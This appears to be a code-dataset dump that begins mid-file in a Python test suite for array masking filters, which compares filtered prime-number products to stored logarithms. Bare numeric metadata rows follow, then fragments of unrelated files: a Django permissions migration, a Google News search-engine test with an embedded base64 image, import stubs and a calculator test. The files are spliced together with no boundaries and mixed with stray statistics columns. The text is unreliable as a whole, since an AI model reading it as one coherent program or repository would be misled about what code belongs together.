mask.filter_sigma_value(data_array=test_array, sigma_multiple=sigma_multiple, sigma_iterations=sigma_iterations) # Create a filtered array for both convince and testing. test_filtered_array = np_ma.array(test_array, mask=test_filter, dtype=int) # A properly completed filter should have the same product value # as this number. This is how the filter is checked. CHECK_STRING = '92.7429789714003440708375243748487223136051046' CHECK_LOGARITHM = sy.Float(CHECK_STRING) __, __, product_log10 = core.math.ifas_large_integer_array_product( integer_array=test_filtered_array.compressed()) # Finally, check. As we are dealing with large single power # prime composite numbers and long decimals, and the smallest # factor change of removing the 2 product still changes the # logarithm enough, checking if the logs are close is good # enough. assert_message = ("The check logarithm is: {check} " "The product logarithm is: {log} " "The filtered array is: \n {array}" .format(check=CHECK_LOGARITHM, log=product_log10, array=test_filtered_array)) assert math.isclose(product_log10, CHECK_LOGARITHM), assert_message # All done. return None def test_filter_percent_truncation(): """ This tests the filtering of percent truncations.""" # Creating the testing array. test_array = test.base.create_prime_test_array(shape=(7,7)) # Prescribed filtering parameters # The top 35% and bottom 10%. top_percent = 0.35 bottom_percent = 0.10 # Create the filter. test_filter = mask.filter_percent_truncation( data_array=test_array, top_percent=top_percent, bottom_percent=bottom_percent) # Create a filtered array for both convince and testing. test_filtered_array = np_ma.array(test_array, mask=test_filter, dtype=int) # A properly completed filter should have the same product value # as this number. This is how the filter is checked. CHECK_STRING = '48.3986809684295405908025212823332315778806862' CHECK_LOGARITHM = sy.Float(CHECK_STRING) __, __, product_log10 = core.math.ifas_large_integer_array_product( integer_array=test_filtered_array.compressed()) # Finally, check. As we are dealing with large single power # prime composite numbers and long decimals, and the smallest # factor change of removing the 2 product still changes the # logarithm enough, checking if the logs are close is good # enough. assert_message = ("The check logarithm is: {check} " "The product logarithm is: {log} " "The filtered array is: \n {array}" .format(check=CHECK_LOGARITHM, log=product_log10, array=test_filtered_array)) assert math.isclose(product_log10, CHECK_LOGARITHM), assert_message # All done. return None def test_filter_pixel_truncation(): """ This tests the filtering of pixel boundaries.""" # Creating the testing array. test_array = test.base.create_prime_test_array(shape=(7,7)) # Prescribed filtering parameters # Top 13 pixels and bottom 9. top_count = 13 bottom_count = 9 # Create the filter. test_filter = mask.filter_pixel_truncation(data_array=test_array, top_count=top_count, bottom_count=bottom_count) # Create a filtered array for both convince and testing. test_filtered_array = np_ma.array(test_array, mask=test_filter, dtype=int) # A properly completed filter should have the same product value # as this number. This is how the filter is checked. CHECK_STRING = '51.0043131557317283360473320982116998982267737' CHECK_LOGARITHM = sy.Float(CHECK_STRING) __, __, product_log10 = core.math.ifas_large_integer_array_product( integer_array=test_filtered_array.compressed()) # Finally, check. As we are dealing with large single power # prime composite numbers and long decimals, and the smallest # factor change of removing the 2 product still changes the # logarithm enough, checking if the logs are close is good # enough. assert_message = ("The check logarithm is: {check} " "The product logarithm is: {log} " "The filtered array is: \n {array}" .format(check=CHECK_LOGARITHM, log=product_log10, array=test_filtered_array)) assert math.isclose(product_log10, CHECK_LOGARITHM), assert_message # All done. return None def test_filter_maximum_value(): """ This tests the filtering of values above a maximum.""" # Creating the testing array. test_array = test.base.create_prime_test_array(shape=(7,7)) # Prescribed filtering parameters # The value 113 should not be masked. maximum_value = 113 # Create the filter. test_filter = mask.filter_maximum_value(data_array=test_array, maximum_value=maximum_value) # Create a filtered array for both convince and testing. test_filtered_array = np_ma.array(test_array, mask=test_filter, dtype=int) # A properly completed filter should have the same product value # as this number. This is how the filter is checked. CHECK_STRING = '46.4998252465517387337527237516559582272076600' CHECK_LOGARITHM = sy.Float(CHECK_STRING) __, __, product_log10 = core.math.ifas_large_integer_array_product( integer_array=test_filtered_array.compressed()) # Finally, check. As we are dealing with large single power # prime composite numbers and long decimals, and the smallest # factor change of removing the 2 product still changes the # logarithm enough, checking if the logs are close is good # enough. assert_message = ("The check logarithm is: {check} " "The product logarithm is: {log} " "The filtered array is: \n {array}" .format(check=CHECK_LOGARITHM, log=product_log10, array=test_filtered_array)) assert math.isclose(product_log10, CHECK_LOGARITHM), assert_message # All done. return None def test_filter_minimum_value(): """ This tests the filtering of values below a minimum.""" # Creating the testing array. test_array = test.base.create_prime_test_array(shape=(7,7)) # Prescribed filtering parameters. # The value 101 itself should not be masked. minimum_value = 101 # Create the filter. test_filter = mask.filter_minimum_value(data_array=test_array, minimum_value=minimum_value) # Create a filter array for both convince and testing. test_filtered_array = np_ma.array(test_array, mask=test_filter, dtype=int) # A properly completed filter should have the same product value # as this number. This is how the filter is checked. CHECK_STRING = '52.5579255086291590806495158287835916351211866' CHECK_LOGARITHM = sy.Float(CHECK_STRING) __, __, product_log10 = core.math.ifas_large_integer_array_product( integer_array=test_filtered_array.compressed()) # Finally, check. As we are dealing with large single power # prime composite numbers and long decimals, and the smallest # factor change of removing the 2 product still changes the # logarithm enough, checking if the logs are close is good # enough. assert_message = ("The check logarithm is: {check} " "The product logarithm is: {log} " "The filtered array is: \n {array}" .format(check=CHECK_LOGARITHM, log=product_log10, array=test_filtered_array)) assert math.isclose(product_log10, CHECK_LOGARITHM), assert_message # All done. return None def test_filter_exact_value(): """ This tests the filtering of exact values.""" # Creating the testing array. test_array = test.base.create_prime_test_array(shape=(7,7)) # Prescribed filtering parameters exact_value = 101 # Create the filter. test_filter = mask.filter_exact_value(data_array=test_array, exact_value=exact_value) # Create a filtered array for both convince and testing. test_filtered_array = np_ma.array(test_array, mask=test_filter, dtype=int) # A properly completed filter should have the same product value # as this number. This is how the filter is checked. CHECK_STRING = '86.9163820638011874618505104537286754939523446' CHECK_LOGARITHM = sy.Float(CHECK_STRING) __, __, product_log10 = core.math.ifas_large_integer_array_product( integer_array=test_filtered_array.compressed()) # Finally, check. As we are dealing with large single power # prime composite numbers and long decimals, and the smallest # factor change of removing the 2 product still changes the # logarithm enough, checking if the logs are close is good # enough. assert_message = ("The check logarithm is: {check} " "The product logarithm is: {log} " "The filtered array is: \n {array}" .format(check=CHECK_LOGARITHM, log=product_log10, array=test_filtered_array)) assert math.isclose(product_log10, CHECK_LOGARITHM), assert_message # All done. return None def test_filter_invalid_value(): """ This tests the filtering of invalid values.""" # Creating the testing array. test_array = test.base.create_prime_test_array(shape=(7,7)) # We need to force invalid values as the prime test creation # does not have them. test_array = np.array(test_array,dtype=float) test_array[1:3,2] = np.inf test_array[2,4:6] = -np.inf test_array[5,1:6] = np.nan # Prescribed filtering parameters pass # Create the filter. test_filter = mask.filter_invalid_value(data_array=test_array) # Create a filtered array for both convince and testing. test_filtered_array = np_ma.array(test_array, mask=test_filter) print(test_filtered_array) # A properly completed filter should have the same product value # as this number. This is how the filter is checked. CHECK_STRING = '70.8884174145533646297736729939104459590381610' CHECK_LOGARITHM = sy.Float(CHECK_STRING) __, __, product_log10 = core.math.ifas_large_integer_array_product( integer_array=test_filtered_array.compressed()) # Finally, check. As we are dealing with large single power # prime composite numbers and long decimals, and the smallest # factor change of removing the 2 product still changes the # logarithm enough, checking if the logs are close is good # enough. assert_message = ("The check logarithm is: {check} " "The product logarithm is: {log} " "The filtered array is: \n {array}" .format(check=CHECK_LOGARITHM, log=product_log10, array=test_filtered_array)) assert math.isclose(product_log10, CHECK_LOGARITHM), assert_message # All done. return None
43.68662
78
0.682679
1,583
12,407
5.149716
0.116867
0.047473
0.037782
0.037782
0.805201
0.791094
0.765088
0.73528
0.73528
0.72473
0
0.045694
0.250343
12,407
283
79
43.840989
0.830771
0.357782
0
0.59854
0
0
0.128769
0.041134
0
0
0
0
0.10219
1
0.051095
false
0.007299
0.058394
0
0.160584
0.007299
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
46b81ea07da63066f9d258dbea466680c469be8c
124
py
Python
netsquid_executor/src/__init__.py
qis-unipr/dqc-executor
842f907830f557e506793553338eecf669e5ed32
[ "Apache-2.0" ]
null
null
null
netsquid_executor/src/__init__.py
qis-unipr/dqc-executor
842f907830f557e506793553338eecf669e5ed32
[ "Apache-2.0" ]
null
null
null
netsquid_executor/src/__init__.py
qis-unipr/dqc-executor
842f907830f557e506793553338eecf669e5ed32
[ "Apache-2.0" ]
1
2021-08-05T13:30:53.000Z
2021-08-05T13:30:53.000Z
import os import sys from .network import * sys.path.append(os.path.join(os.path.dirname(__file__), '../../dqc-circuit'))
17.714286
77
0.709677
19
124
4.421053
0.631579
0.214286
0
0
0
0
0
0
0
0
0
0
0.096774
124
6
78
20.666667
0.75
0
0
0
0
0
0.137097
0
0
0
0
0
0
1
0
true
0
0.75
0
0.75
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
46bc1f403cedc6023a0b25ab9b1e9661581190c2
161
py
Python
ex47_bc/tests/test_language.py
techieguy007/learn-more-python-the-hard-way-solutions
7886c860f69d69739a41d6490b8dc3fa777f227b
[ "Zed", "Unlicense" ]
466
2016-11-01T19:40:59.000Z
2022-03-23T16:34:13.000Z
ex47_bc/tests/test_language.py
Desperaaado/learn-more-python-the-hard-way-solutions
7886c860f69d69739a41d6490b8dc3fa777f227b
[ "Zed", "Unlicense" ]
2
2017-09-20T09:01:53.000Z
2017-09-21T15:03:56.000Z
ex47_bc/tests/test_language.py
Desperaaado/learn-more-python-the-hard-way-solutions
7886c860f69d69739a41d6490b8dc3fa777f227b
[ "Zed", "Unlicense" ]
241
2017-06-17T08:02:26.000Z
2022-03-30T09:09:39.000Z
from calc.run import run def test_simple_function(): run(open("test1.calc").readlines()) def test_simple_script(): run(open("test2.calc").readlines())
20.125
39
0.708075
23
161
4.782609
0.565217
0.127273
0.236364
0
0
0
0
0
0
0
0
0.014184
0.124224
161
7
40
23
0.765957
0
0
0
0
0
0.124224
0
0
0
0
0
0
1
0.4
true
0
0.2
0
0.6
0
1
0
0
null
0
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
1
0
0
0
1
0
0
6
20224c44d1636245b5d3e65fc4cfe887eb1054bd
91
py
Python
getnet/services/payments/__init__.py
7bruno/getnet-py
590db2f19e0c7f98ffdfbb27f4c6ffd7fb1f47ed
[ "MIT" ]
2
2021-04-09T20:17:41.000Z
2021-04-09T20:18:06.000Z
getnet/services/payments/__init__.py
7bruno/getnet-py
590db2f19e0c7f98ffdfbb27f4c6ffd7fb1f47ed
[ "MIT" ]
null
null
null
getnet/services/payments/__init__.py
7bruno/getnet-py
590db2f19e0c7f98ffdfbb27f4c6ffd7fb1f47ed
[ "MIT" ]
null
null
null
from .order import Order from .customer import Customer from .order_items import OrderItem
22.75
34
0.835165
13
91
5.769231
0.461538
0.24
0
0
0
0
0
0
0
0
0
0
0.131868
91
3
35
30.333333
0.949367
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
203d8d3640d5f61cc6184a7f7fcd72ee159a148a
81
py
Python
lab-1/tempCodeRunnerFile.py
HITOfficial/python-laboratories
ae727563c95d1a5d5921566a3267594139d377bd
[ "MIT" ]
null
null
null
lab-1/tempCodeRunnerFile.py
HITOfficial/python-laboratories
ae727563c95d1a5d5921566a3267594139d377bd
[ "MIT" ]
null
null
null
lab-1/tempCodeRunnerFile.py
HITOfficial/python-laboratories
ae727563c95d1a5d5921566a3267594139d377bd
[ "MIT" ]
null
null
null
# print(check_expr("01>")) # print(check_expr("10>")) # print(check_expr("11>"))
20.25
26
0.62963
12
81
4
0.5
0.625
0.875
0
0
0
0
0
0
0
0
0.08
0.074074
81
4
27
20.25
0.56
0.91358
0
null
0
null
0
0
null
0
0
0
null
1
null
true
0
0
null
null
null
1
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
1
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
0
0
0
6
64466165c213dfc2a84ac0ba65fde11639e42804
2,907
py
Python
mapss/static/packages/arches/arches/app/models/migrations/4679_resource_editor_permissions.py
MPI-MAPSS/MAPSS
3a5c0109758801717aaa8de1125ca5e98f83d3b4
[ "CC0-1.0" ]
null
null
null
mapss/static/packages/arches/arches/app/models/migrations/4679_resource_editor_permissions.py
MPI-MAPSS/MAPSS
3a5c0109758801717aaa8de1125ca5e98f83d3b4
[ "CC0-1.0" ]
null
null
null
mapss/static/packages/arches/arches/app/models/migrations/4679_resource_editor_permissions.py
MPI-MAPSS/MAPSS
3a5c0109758801717aaa8de1125ca5e98f83d3b4
[ "CC0-1.0" ]
null
null
null
# -*- coding: utf-8 -*- # Generated by Django 1.9.2 on 2017-04-25 11:36 import os import uuid import django.db.models.deletion import django.contrib.postgres.fields.jsonb from django.db import migrations, models from django.core import management from arches.app.models.system_settings import settings def add_permissions(apps, schema_editor, with_create_permissions=True): db_alias = schema_editor.connection.alias Group = apps.get_model("auth", "Group") Permission = apps.get_model("auth", "Permission") write_nodegroup = Permission.objects.get(codename='write_nodegroup', content_type__app_label='models', content_type__model='nodegroup') delete_nodegroup = Permission.objects.get(codename='delete_nodegroup', content_type__app_label='models', content_type__model='nodegroup') resource_editor_group = Group.objects.using(db_alias).get(name='Resource Editor') resource_editor_group.permissions.add(write_nodegroup) resource_editor_group.permissions.add(delete_nodegroup) resource_editor_group = Group.objects.using(db_alias).get(name='Resource Reviewer') resource_editor_group.permissions.add(write_nodegroup) resource_editor_group.permissions.add(delete_nodegroup) resource_editor_group = Group.objects.using(db_alias).get(name='Crowdsource Editor') resource_editor_group.permissions.add(write_nodegroup) resource_editor_group.permissions.add(delete_nodegroup) def remove_permissions(apps, schema_editor, with_create_permissions=True): db_alias = schema_editor.connection.alias Group = apps.get_model("auth", "Group") Permission = apps.get_model("auth", "Permission") write_nodegroup = Permission.objects.get(codename='write_nodegroup', content_type__app_label='models', content_type__model='nodegroup') delete_nodegroup = Permission.objects.get(codename='delete_nodegroup', content_type__app_label='models', content_type__model='nodegroup') resource_editor_group = Group.objects.using(db_alias).get(name='Resource Editor') resource_editor_group.permissions.remove(write_nodegroup) resource_editor_group.permissions.remove(delete_nodegroup) resource_editor_group = Group.objects.using(db_alias).get(name='Resource Reviewer') resource_editor_group.permissions.remove(write_nodegroup) resource_editor_group.permissions.remove(delete_nodegroup) resource_editor_group = Group.objects.using(db_alias).get(name='Crowdsource Editor') resource_editor_group.permissions.remove(write_nodegroup) resource_editor_group.permissions.remove(delete_nodegroup) class Migration(migrations.Migration): dependencies = [ ('models', '4384_adds_rerender_widget_config'), ] operations = [ ## the following command has to be run after the previous RunSQL commands that update the domain datatype values migrations.RunPython(add_permissions,remove_permissions), ]
46.887097
141
0.79257
365
2,907
6.00274
0.243836
0.127796
0.156093
0.153355
0.77864
0.77864
0.77864
0.77864
0.77864
0.77864
0
0.007725
0.109391
2,907
61
142
47.655738
0.838548
0.060888
0
0.636364
1
0
0.112294
0.011743
0
0
0
0
0
1
0.045455
false
0
0.159091
0
0.272727
0
0
0
0
null
0
0
0
0
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
644b944e0d13595ffcbbae8fec0a3e61ba471ec9
34
py
Python
crabs/options.py
tor4z/crabs
7d525ebe8a0791a82635fad744ec5c92adc19cf0
[ "MIT" ]
null
null
null
crabs/options.py
tor4z/crabs
7d525ebe8a0791a82635fad744ec5c92adc19cf0
[ "MIT" ]
4
2021-01-07T22:41:11.000Z
2021-06-01T22:10:14.000Z
crabs/options.py
tor4z/crabs
7d525ebe8a0791a82635fad744ec5c92adc19cf0
[ "MIT" ]
null
null
null
from .http_client.options import *
34
34
0.823529
5
34
5.4
1
0
0
0
0
0
0
0
0
0
0
0
0.088235
34
1
34
34
0.870968
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
6454dde4728a4809c9dc82544950d5d84329e67c
7,393
py
Python
Toolkits/Discovery/meta/searx/tests/unit/engines/test_google_news.py
roscopecoltran/SniperKit-Core
4600dffe1cddff438b948b6c22f586d052971e04
[ "MIT" ]
null
null
null
Toolkits/Discovery/meta/searx/tests/unit/engines/test_google_news.py
roscopecoltran/SniperKit-Core
4600dffe1cddff438b948b6c22f586d052971e04
[ "MIT" ]
null
null
null
Toolkits/Discovery/meta/searx/tests/unit/engines/test_google_news.py
roscopecoltran/SniperKit-Core
4600dffe1cddff438b948b6c22f586d052971e04
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- from collections import defaultdict import mock from searx.engines import google_news from searx.testing import SearxTestCase class TestGoogleNewsEngine(SearxTestCase): def test_request(self): query = 'test_query' dicto = defaultdict(dict) dicto['pageno'] = 1 dicto['language'] = 'fr_FR' dicto['time_range'] = 'w' params = google_news.request(query, dicto) self.assertIn('url', params) self.assertIn(query, params['url']) self.assertIn('fr', params['url']) dicto['language'] = 'all' params = google_news.request(query, dicto) self.assertIn('url', params) self.assertNotIn('fr', params['url']) def test_response(self): self.assertRaises(AttributeError, google_news.response, None) self.assertRaises(AttributeError, google_news.response, []) self.assertRaises(AttributeError, google_news.response, '') self.assertRaises(AttributeError, google_news.response, '[]') response = mock.Mock(text='{}') self.assertEqual(google_news.response(response), []) response = mock.Mock(text='{"data": []}') self.assertEqual(google_news.response(response), []) html = u""" <div class="g"> <div class="ts _V6c _Zmc _XO _knc _d7c"><a class="top _vQb _mnc" href="http://this.is.the.url" onmousedown="return rwt(this,'','','','5','AFQjCNGixEtJGC3qTB9pYFLXlRj8XXwdiA','','0ahUKEwiG7O_M5-rQAhWDtRoKHd0RD5QQvIgBCCwwBA','','',event)"><img class="th _lub" id="news-thumbnail-image-52779299683347" src="data:image/jpeg;base64,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" alt="A(z) south témájának képe a következőből: CBC.ca" data-deferred="1" onload="google.aft&amp;&amp;google.aft(this)"></a><div class="_cnc"><h3 class="r _U6c"><a class="l _HId" href="http://this.is.the.url" onmousedown="return rwt(this,'','','','5','AFQjCNGixEtJGC3qTB9pYFLXlRj8XXwdiA','','0ahUKEwiG7O_M5-rQAhWDtRoKHd0RD5QQqQIILSgAMAQ','','',event)">Meet Thuli Madonsela — <em>South</em> Africa's conscience</a></h3><div class="slp"><span class="_tQb _IId">CBC.ca</span><span class="_v5">-</span><span class="f nsa _uQb">9 órával ezelőtt</span></div><div class="st"><em>South</em> African Public Protector</div></div><div class="_Xmc card-section"><a class="_sQb" href="http://www.news24.com/Columnists/Mpumelelo_Mkhabela/who-really-governs-south-africa-20161209" onmousedown="return rwt(this,'','','','5','AFQjCNHhc2MnYSZ5T4COqInzvgoju5k5bA','','0ahUKEwiG7O_M5-rQAhWDtRoKHd0RD5QQuogBCC4oATAE','','',event)">Who really governs <em>South</em> Africa?</a><br><span class="_Wmc _GId">Vélemény</span><span class="_v5">-</span><span class="_tQb _IId">News24</span><span class="_v5">-</span><span class="f nsa _uQb">2016. dec. 8.</span></div><div class="_Vmc"></div></div> </div> """ # noqa response = mock.Mock(text=html) results = google_news.response(response) self.assertEqual(type(results), list) self.assertEqual(len(results), 1) self.assertEqual(results[0]['title'], u'Meet Thuli Madonsela \u2014 South Africa\'s conscience') self.assertEqual(results[0]['url'], 'http://this.is.the.url') self.assertEqual(results[0]['content'], 'South African Public Protector')
144.960784
5,644
0.843906
499
7,393
12.416834
0.492986
0.016139
0.020336
0.023241
0.12153
0.108457
0.087476
0.082957
0.082957
0.082957
0
0.102852
0.061004
7,393
50
5,645
147.86
0.789542
0.003517
0
0.15
0
0.025
0.797257
0.668387
0
1
0
0
0.4
1
0.05
false
0
0.1
0
0.175
0
0
0
1
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
1
0
0
0
0
0
0
1
1
null
1
0
0
0
0
0
0
0
0
0
0
0
0
6
648696ea1dd02801d739e6e534a41a0641b1a7c6
48
py
Python
super_taxi/controllers/registration.py
sanjayatb/taxi-booking-system
b78f8ab00a7f6d12c786331880242ce0306480bb
[ "MIT" ]
null
null
null
super_taxi/controllers/registration.py
sanjayatb/taxi-booking-system
b78f8ab00a7f6d12c786331880242ce0306480bb
[ "MIT" ]
null
null
null
super_taxi/controllers/registration.py
sanjayatb/taxi-booking-system
b78f8ab00a7f6d12c786331880242ce0306480bb
[ "MIT" ]
1
2021-09-17T18:23:13.000Z
2021-09-17T18:23:13.000Z
"Registation controller implementaion goes here"
48
48
0.875
5
48
8.4
1
0
0
0
0
0
0
0
0
0
0
0
0.083333
48
1
48
48
0.954545
0.958333
0
0
0
0
0.938776
0
0
0
0
0
0
1
0
true
0
0
0
0
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
1
0
0
0
0
1
0
null
0
0
0
0
0
0
1
0
0
0
0
0
0
6
64c2c94603cdbaefe677a154621a4b1aae942632
798
py
Python
2421.py
ErFer7/URI-Python
94c36985852204e34806650e4ffec48d4d9e9ab1
[ "MIT" ]
1
2022-02-06T19:36:33.000Z
2022-02-06T19:36:33.000Z
2421.py
ErFer7/URI-Python
94c36985852204e34806650e4ffec48d4d9e9ab1
[ "MIT" ]
null
null
null
2421.py
ErFer7/URI-Python
94c36985852204e34806650e4ffec48d4d9e9ab1
[ "MIT" ]
null
null
null
